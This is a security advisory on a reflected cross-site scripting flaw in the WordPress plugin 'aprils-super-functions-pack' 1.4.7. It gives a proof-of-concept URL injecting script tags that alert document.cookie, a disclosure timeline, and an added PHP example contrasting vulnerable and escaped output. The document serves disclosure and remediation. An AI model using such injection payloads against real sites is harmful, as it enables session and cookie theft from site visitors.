wp-plugin : aprils-super-functions-pack – A3-Cross-Site Scripting (XSS)

Plugin Details

Plugin Name : aprils-super-functions-pack

Affected Version : 1.4.7 (and most probably lower versions, if any)

Vulnerability : A3-Cross-Site Scripting (XSS)

Identified by : Anant Shrivastava


Technical Details

Minimum Level of Access Required : Unauthenticated

PoC - (Proof of Concept) :

http://localhost/wp-content/plugins/aprils-super-functions-pack/readme.php?type=type"><script>alert(document.cookie)</script>&page=page"><script>alert(document.cookie)</script>&

Vulnerable Parameter : page, type

Type of XSS : Reflected

Fixed in : 1.4.8

Trac Changelog : https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=833934%40aprils-super-functions-pack&old=742940%40aprils-super-functions-pack&sfp_email=&sfph_mail=
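The bug class behind the PoC above, shown as an added example that is not the plugin's own readme.php (the real fix is in the 1.4.8 changeset linked above): a hypothetical page that reflects the type and page parameters into an HTML attribute, beside a hardened version. The allow-list of type values and the link markup are assumptions; plain-PHP escaping functions are used so the snippet runs without WordPress loaded.

```php
<?php
// Constructed illustration of the reported bug class, not the plugin's code.

// Vulnerable form: "type" and "page" land inside quoted attributes and the
// link text unescaped, so a value containing `">` closes the attribute and
// the tag, and whatever follows (e.g. a <script> element) is rendered as markup.
function render_nav_vulnerable(array $get): string {
    $type = $get['type'] ?? '';
    $page = $get['page'] ?? '';
    return '<a href="readme.php?type=' . $type . '&page=' . $page . '">' . $page . '</a>';
}

// Hardened form. In a WordPress plugin the equivalents are esc_url() for the
// href and esc_attr()/esc_html() for attribute and text output; here the
// plain-PHP functions rawurlencode() and htmlspecialchars() are used instead.
function render_nav_fixed(array $get): string {
    // Assumption: "type" selects one of a known set of sections, so it can be
    // allow-listed rather than reflected. Unknown values fall back to a default.
    $allowed_types = ['shortcodes', 'functions', 'widgets'];
    $type = in_array($get['type'] ?? '', $allowed_types, true) ? $get['type'] : 'shortcodes';

    // "page" is free text, so it is encoded for the query string and then
    // HTML-escaped (including quotes) wherever it is reflected.
    $page = (string) ($get['page'] ?? '');
    $href = 'readme.php?type=' . rawurlencode($type) . '&page=' . rawurlencode($page);
    return '<a href="' . htmlspecialchars($href, ENT_QUOTES, 'UTF-8') . '">'
         . htmlspecialchars($page, ENT_QUOTES, 'UTF-8') . '</a>';
}

// Constructed input shaped like the advisory's PoC parameters.
$payload = [
    'type' => 'type"><script>alert(1)</script>',
    'page' => 'page"><script>alert(1)</script>',
];
echo render_nav_vulnerable($payload), PHP_EOL; // <script> reaches the browser as markup
echo render_nav_fixed($payload), PHP_EOL;      // the same input is rendered as inert text
```

The check a reviewer applies to the fixed form is that every reflected value passes through an escaper appropriate to its context (URL, attribute, or text node) and that quotes are included in the escape set, which is what ENT_QUOTES guarantees.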

Disclosure Timeline

Vendor Contacted : 2014-01-04

Plugin Status : Updated on 2014-01-06

Public Disclosure : July 7, 2014

CVE Number : Not assigned yet

Plugin Description :

This plugin contains a large number of shortcodes that makes it easy to lay out text on your site in more exciting ways than simply paragraphs, headers, and lists. There are also some template functions and useful javascript that theme developers may find useful.

Shortcodes:

* Columns - 2, 3, or 4
* Boxes with particular color, height, title
* Tabs (js-driven)
* Expand/Hide (js-driven)
* Buttons and icons
* Pull-quotes
* Dropcaps
* ... and more

Other Functions:

* Template function for displaying pages 'in the current section'
* Template function for displaying the image that belongs to a post
* JS to remove 'title' tags from WP-generated menus
* JS to allow pre-selecting a recipient from certain CForms forms
* JS to make suckerfish menus work in IE

Widgets:

* A replacement Text widget that lets you specify a class
